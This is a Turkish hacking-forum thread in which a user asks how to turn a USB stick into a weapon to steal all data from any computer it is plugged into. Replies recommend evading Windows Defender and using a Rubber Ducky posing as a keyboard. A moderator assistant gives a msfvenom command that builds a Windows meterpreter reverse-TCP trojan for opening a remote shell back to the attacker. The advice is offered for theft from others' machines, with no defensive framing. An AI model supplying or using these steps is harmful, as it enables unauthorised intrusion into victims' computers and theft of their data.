USB bellek ile bilgisayardaki verileri nasıl çalabilirim

aressz

Yeni üye
10 Şub 2022
20
2
arkadaşlar usb belleğimi bir silah gibi kullanmak istiyorum bir pc ye taktığımda o pcdeki bütün bilgileri alma gibi bir şansım varmı

Kruvazör

Ar-Ge Ekibi Lideri
28 Mar 2020
1,746
2,571
Wrong Side Of Heaven
arkadaşlar usb belleğimi bir silah gibi kullanmak istiyorum bir pc ye taktığımda o pcdeki bütün bilgileri alma gibi bir şansım varmı
kişisel usbnize çeşitli yazılımlar ekleyerek usbnizi tehlikeli bie hale getirebilirsiniz fakat
defenderdan geçmesi için özel olarak gizlemeniz gerekecektir ve bununla uğraşmak yerine Rubber Ducky kullanabilirsiniz.

usb nasıl bir silah haline getirilir;
usbnizi saldıracağınız cihaza bir mouse,klavye gibi tanıtarak autorun işlemini yaptırabilirsiniz fakat
bu işlem sıradan usblerde ( tanıma anlamında) olmaz. yani autorun yapamazsınız.

nichtSchwindeln

Yeni üye
15 May 2022
1
1
dostum AutoRun şeklinde dosya oluştur diyeceğim fakat oda windows güvenlik güncellemeleri yüzünden devre dışı bırakıldı tek çare Rubber Ducky yapman.Veya USB AutoRun creator programını kullanabilirsin.

BekKam

Üye
26 Şub 2021
163
74
Ötüken ovası
yapman gerekenler kod yazmayı bilmiyorsan internet üzerinden biraz araştırma yapıp en kullanılabilir kaynak kodu bulmak ve bunu rubber ducknin içine atmak(eğer lehim yapabiliyorsan usbyi kendin de yapabilirsin). gerisini kod kendisi halleder zaten.
gerekli diğer bilgileri buradan edinebilirsin:

MemoryTiger

Katılımcı Üye
8 Mar 2019
446
248
21
Kali Linux
MERHABA DOSTUM
SEN YARDIM AÇAR AÇMAZ GELDİM :)

5aE7rL.png

USBNİN İÇİNE RAT YA DA METASPLİOT İLE OLUŞTURDUĞUN TROJANI AT.
ARDINDAN O TROJANI MASAÜSTÜNE AT VE ÇALIŞTIR.

NASIL TROJAN OLUŞUR
Ben Bu Konuda Android Olarak Gösterdim Bilgisayar İçin Sadece Bu Kodu Girmen Yeterli.
Trojan Oluştururken
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > root/Masaüstü/deneme.exe
şeklinde oluştur ve gerisini hallet

YUKARDAKİNİ ANLAMAK İÇİ KONUMA GÖZ AT :)

UNUTMAKİ BİR YARDIM UZAĞINDAYIZ :)

▂ ▄ ▅ ▆ ▇ █ MODERATÖR ASİSTAN █ ▇ ▆ ▅ ▄ ▂

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.